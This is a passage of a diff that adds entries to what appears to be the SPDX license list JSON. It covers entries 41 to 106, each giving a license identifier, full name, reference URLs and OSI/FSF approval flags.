+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-UK.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-UK.json",
+ "referenceNumber": 41,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 2.0 England and Wales",
+ "licenseId": "CC-BY-NC-SA-2.0-UK",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/2.0/uk/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NLOD-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NLOD-2.0.json",
+ "referenceNumber": 42,
+ "name": "Norwegian Licence for Open Government Data (NLOD) 2.0",
+ "licenseId": "NLOD-2.0",
+ "seeAlso": [
+ "http://data.norge.no/nlod/en/2.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/gnuplot.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/gnuplot.json",
+ "referenceNumber": 43,
+ "name": "gnuplot License",
+ "licenseId": "gnuplot",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Gnuplot"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/EPICS.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EPICS.json",
+ "referenceNumber": 44,
+ "name": "EPICS Open License",
+ "licenseId": "EPICS",
+ "seeAlso": [
+ "https://epics.anl.gov/license/open.php"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Info-ZIP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Info-ZIP.json",
+ "referenceNumber": 45,
+ "name": "Info-ZIP License",
+ "licenseId": "Info-ZIP",
+ "seeAlso": [
+ "http://www.info-zip.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.0.json",
+ "referenceNumber": 46,
+ "name": "Open LDAP Public License v2.0 (or possibly 2.0A and 2.0B)",
+ "licenseId": "OLDAP-2.0",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dcbf50f4e1185a21abd4c0a54d3f4341fe28f36ea"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-P-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-P-2.0.json",
+ "referenceNumber": 47,
+ "name": "CERN Open Hardware Licence Version 2 - Permissive",
+ "licenseId": "CERN-OHL-P-2.0",
+ "seeAlso": [
+ "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-Warranty.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-Warranty.json",
+ "referenceNumber": 48,
+ "name": "BSD 3-Clause No Nuclear Warranty",
+ "licenseId": "BSD-3-Clause-No-Nuclear-Warranty",
+ "seeAlso": [
+ "https://jogamp.org/git/?p\u003dgluegen.git;a\u003dblob_plain;f\u003dLICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AML.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AML.json",
+ "referenceNumber": 49,
+ "name": "Apple MIT License",
+ "licenseId": "AML",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Apple_MIT_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MulanPSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MulanPSL-1.0.json",
+ "referenceNumber": 50,
+ "name": "Mulan Permissive Software License, Version 1",
+ "licenseId": "MulanPSL-1.0",
+ "seeAlso": [
+ "https://license.coscl.org.cn/MulanPSL/",
+ "https://github.com/yuwenlong/longphp/blob/25dfb70cc2a466dc4bb55ba30901cbce08d164b5/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Multics.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Multics.json",
+ "referenceNumber": 51,
+ "name": "Multics License",
+ "licenseId": "Multics",
+ "seeAlso": [
+ "https://opensource.org/licenses/Multics"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/VSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/VSL-1.0.json",
+ "referenceNumber": 52,
+ "name": "Vovida Software License v1.0",
+ "licenseId": "VSL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/VSL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/RSA-MD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RSA-MD.json",
+ "referenceNumber": 53,
+ "name": "RSA Message-Digest License",
+ "licenseId": "RSA-MD",
+ "seeAlso": [
+ "http://www.faqs.org/rfcs/rfc1321.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-PDDC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-PDDC.json",
+ "referenceNumber": 54,
+ "name": "Creative Commons Public Domain Dedication and Certification",
+ "licenseId": "CC-PDDC",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/publicdomain/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-2.1-JP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.1-JP.json",
+ "referenceNumber": 55,
+ "name": "Creative Commons Attribution Share Alike 2.1 Japan",
+ "licenseId": "CC-BY-SA-2.1-JP",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/2.1/jp/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.2.json",
+ "referenceNumber": 56,
+ "name": "LaTeX Project Public License v1.2",
+ "licenseId": "LPPL-1.2",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-2.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Spencer-94.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Spencer-94.json",
+ "referenceNumber": 57,
+ "name": "Spencer License 94",
+ "licenseId": "Spencer-94",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-1.2.json",
+ "referenceNumber": 58,
+ "name": "Open LDAP Public License v1.2",
+ "licenseId": "OLDAP-1.2",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d42b0383c50c299977b5893ee695cf4e486fb0dc7"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/O-UDA-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/O-UDA-1.0.json",
+ "referenceNumber": 59,
+ "name": "Open Use of Data Agreement v1.0",
+ "licenseId": "O-UDA-1.0",
+ "seeAlso": [
+ "https://github.com/microsoft/Open-Use-of-Data-Agreement/blob/v1.0/O-UDA-1.0.md",
+ "https://cdla.dev/open-use-of-data-agreement-v1-0/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.7.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.7.json",
+ "referenceNumber": 60,
+ "name": "Open LDAP Public License v2.7",
+ "licenseId": "OLDAP-2.7",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d47c2415c1df81556eeb39be6cad458ef87c534a2"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Glulxe.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Glulxe.json",
+ "referenceNumber": 61,
+ "name": "Glulxe License",
+ "licenseId": "Glulxe",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Glulxe"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/iMatix.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/iMatix.json",
+ "referenceNumber": 62,
+ "name": "iMatix Standard Function Library Agreement",
+ "licenseId": "iMatix",
+ "seeAlso": [
+ "http://legacy.imatix.com/html/sfl/sfl4.htm#license"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/TAPR-OHL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TAPR-OHL-1.0.json",
+ "referenceNumber": 63,
+ "name": "TAPR Open Hardware License v1.0",
+ "licenseId": "TAPR-OHL-1.0",
+ "seeAlso": [
+ "https://www.tapr.org/OHL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NBPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NBPL-1.0.json",
+ "referenceNumber": 64,
+ "name": "Net Boolean Public License v1",
+ "licenseId": "NBPL-1.0",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d37b4b3f6cc4bf34e1d3dec61e69914b9819d8894"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LiLiQ-R-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LiLiQ-R-1.1.json",
+ "referenceNumber": 65,
+ "name": "Licence Libre du Québec – Réciprocité version 1.1",
+ "licenseId": "LiLiQ-R-1.1",
+ "seeAlso": [
+ "https://www.forge.gouv.qc.ca/participez/licence-logicielle/licence-libre-du-quebec-liliq-en-francais/licence-libre-du-quebec-reciprocite-liliq-r-v1-1/",
+ "http://opensource.org/licenses/LiLiQ-R-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Noweb.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Noweb.json",
+ "referenceNumber": 66,
+ "name": "Noweb License",
+ "licenseId": "Noweb",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Noweb"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC0-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC0-1.0.json",
+ "referenceNumber": 67,
+ "name": "Creative Commons Zero v1.0 Universal",
+ "licenseId": "CC0-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/publicdomain/zero/1.0/legalcode"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-Protection.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-Protection.json",
+ "referenceNumber": 68,
+ "name": "BSD Protection License",
+ "licenseId": "BSD-Protection",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/BSD_Protection_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-2.5.json",
+ "referenceNumber": 69,
+ "name": "Creative Commons Attribution Non Commercial 2.5 Generic",
+ "licenseId": "CC-BY-NC-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zlib.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zlib.json",
+ "referenceNumber": 70,
+ "name": "zlib License",
+ "licenseId": "Zlib",
+ "seeAlso": [
+ "http://www.zlib.net/zlib_license.html",
+ "https://opensource.org/licenses/Zlib"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-invariants-or-later.json",
+ "referenceNumber": 71,
+ "name": "GNU Free Documentation License v1.3 or later - invariants",
+ "licenseId": "GFDL-1.3-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0-AT.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-AT.json",
+ "referenceNumber": 72,
+ "name": "Creative Commons Attribution 3.0 Austria",
+ "licenseId": "CC-BY-3.0-AT",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/at/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.3c.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.3c.json",
+ "referenceNumber": 73,
+ "name": "LaTeX Project Public License v1.3c",
+ "licenseId": "LPPL-1.3c",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-3c.txt",
+ "https://opensource.org/licenses/LPPL-1.3c"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/EPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EPL-1.0.json",
+ "referenceNumber": 74,
+ "name": "Eclipse Public License 1.0",
+ "licenseId": "EPL-1.0",
+ "seeAlso": [
+ "http://www.eclipse.org/legal/epl-v10.html",
+ "https://opensource.org/licenses/EPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-invariants-or-later.json",
+ "referenceNumber": 75,
+ "name": "GNU Free Documentation License v1.1 or later - invariants",
+ "licenseId": "GFDL-1.1-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ANTLR-PD-fallback.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ANTLR-PD-fallback.json",
+ "referenceNumber": 76,
+ "name": "ANTLR Software Rights Notice with license fallback",
+ "licenseId": "ANTLR-PD-fallback",
+ "seeAlso": [
+ "http://www.antlr2.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.4.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.4.json",
+ "referenceNumber": 77,
+ "name": "Open LDAP Public License v2.4",
+ "licenseId": "OLDAP-2.4",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dcd1284c4a91a8a380d904eee68d1583f989ed386"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.3.json",
+ "referenceNumber": 78,
+ "name": "Open LDAP Public License v2.3",
+ "licenseId": "OLDAP-2.3",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dd32cf54a32d581ab475d23c810b0a7fbaf8d63c3"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ZPL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ZPL-2.1.json",
+ "referenceNumber": 79,
+ "name": "Zope Public License 2.1",
+ "licenseId": "ZPL-2.1",
+ "seeAlso": [
+ "http://old.zope.org/Resources/ZPL/"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Apache-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Apache-2.0.json",
+ "referenceNumber": 80,
+ "name": "Apache License 2.0",
+ "licenseId": "Apache-2.0",
+ "seeAlso": [
+ "https://www.apache.org/licenses/LICENSE-2.0",
+ "https://opensource.org/licenses/Apache-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SGI-B-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SGI-B-2.0.json",
+ "referenceNumber": 81,
+ "name": "SGI Free Software License B v2.0",
+ "licenseId": "SGI-B-2.0",
+ "seeAlso": [
+ "http://oss.sgi.com/projects/FreeB/SGIFreeSWLicB.2.0.pdf"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Hippocratic-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Hippocratic-2.1.json",
+ "referenceNumber": 82,
+ "name": "Hippocratic License 2.1",
+ "licenseId": "Hippocratic-2.1",
+ "seeAlso": [
+ "https://firstdonoharm.dev/version/2/1/license.html",
+ "https://github.com/EthicalSource/hippocratic-license/blob/58c0e646d64ff6fbee275bfe2b9492f914e3ab2a/LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0-DE.json",
+ "referenceNumber": 83,
+ "name": "Creative Commons Attribution Share Alike 3.0 Germany",
+ "licenseId": "CC-BY-SA-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-1.0.json",
+ "referenceNumber": 84,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 1.0 Generic",
+ "licenseId": "CC-BY-NC-SA-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.1-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.1-or-later.json",
+ "referenceNumber": 85,
+ "name": "GNU Lesser General Public License v2.1 or later",
+ "licenseId": "LGPL-2.1-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+ "https://opensource.org/licenses/LGPL-2.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0-US.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-US.json",
+ "referenceNumber": 86,
+ "name": "Creative Commons Attribution 3.0 United States",
+ "licenseId": "CC-BY-3.0-US",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/us/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TCP-wrappers.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TCP-wrappers.json",
+ "referenceNumber": 87,
+ "name": "TCP Wrappers License",
+ "licenseId": "TCP-wrappers",
+ "seeAlso": [
+ "http://rc.quest.com/topics/openssh/license.php#tcpwrappers"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-invariants-or-later.json",
+ "referenceNumber": 88,
+ "name": "GNU Free Documentation License v1.2 or later - invariants",
+ "licenseId": "GFDL-1.2-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Eurosym.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Eurosym.json",
+ "referenceNumber": 89,
+ "name": "Eurosym License",
+ "licenseId": "Eurosym",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Eurosym"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1.json",
+ "referenceNumber": 90,
+ "name": "GNU Free Documentation License v1.1",
+ "licenseId": "GFDL-1.1",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.0.json",
+ "referenceNumber": 91,
+ "name": "LaTeX Project Public License v1.0",
+ "licenseId": "LPPL-1.0",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-0.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.0+.json",
+ "referenceNumber": 92,
+ "name": "GNU Library General Public License v2 or later",
+ "licenseId": "LGPL-2.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SGI-B-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SGI-B-1.0.json",
+ "referenceNumber": 93,
+ "name": "SGI Free Software License B v1.0",
+ "licenseId": "SGI-B-1.0",
+ "seeAlso": [
+ "http://oss.sgi.com/projects/FreeB/SGIFreeSWLicB.1.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/APL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APL-1.0.json",
+ "referenceNumber": 94,
+ "name": "Adaptive Public License 1.0",
+ "licenseId": "APL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/APL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/libtiff.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/libtiff.json",
+ "referenceNumber": 95,
+ "name": "libtiff License",
+ "licenseId": "libtiff",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/libtiff"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-2.1.json",
+ "referenceNumber": 96,
+ "name": "Academic Free License v2.1",
+ "licenseId": "AFL-2.1",
+ "seeAlso": [
+ "http://opensource.linux-mirror.org/licenses/afl-2.1.txt"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-1.0.json",
+ "referenceNumber": 97,
+ "name": "Creative Commons Attribution Non Commercial 1.0 Generic",
+ "licenseId": "CC-BY-NC-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GD.json",
+ "referenceNumber": 98,
+ "name": "GD License",
+ "licenseId": "GD",
+ "seeAlso": [
+ "https://libgd.github.io/manuals/2.3.0/files/license-txt.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-1.1.json",
+ "referenceNumber": 99,
+ "name": "Academic Free License v1.1",
+ "licenseId": "AFL-1.1",
+ "seeAlso": [
+ "http://opensource.linux-mirror.org/licenses/afl-1.1.txt",
+ "http://wayback.archive.org/web/20021004124254/http://www.opensource.org/licenses/academic.php"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-IGO.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-IGO.json",
+ "referenceNumber": 100,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 IGO",
+ "licenseId": "CC-BY-NC-ND-3.0-IGO",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/3.0/igo/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Unicode-DFS-2015.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Unicode-DFS-2015.json",
+ "referenceNumber": 101,
+ "name": "Unicode License Agreement - Data Files and Software (2015)",
+ "licenseId": "Unicode-DFS-2015",
+ "seeAlso": [
+ "https://web.archive.org/web/20151224134844/http://unicode.org/copyright.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-only.json",
+ "referenceNumber": 102,
+ "name": "GNU Free Documentation License v1.2 only",
+ "licenseId": "GFDL-1.2-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MPL-1.1.json",
+ "referenceNumber": 103,
+ "name": "Mozilla Public License 1.1",
+ "licenseId": "MPL-1.1",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/MPL-1.1.html",
+ "https://opensource.org/licenses/MPL-1.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-only.json",
+ "referenceNumber": 104,
+ "name": "GNU General Public License v2.0 only",
+ "licenseId": "GPL-2.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+ "https://opensource.org/licenses/GPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-4.0.json",
+ "referenceNumber": 105,
+ "name": "Creative Commons Attribution Non Commercial 4.0 International",
+ "licenseId": "CC-BY-NC-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/4.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/FreeImage.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FreeImage.json",
+ "referenceNumber": 106,
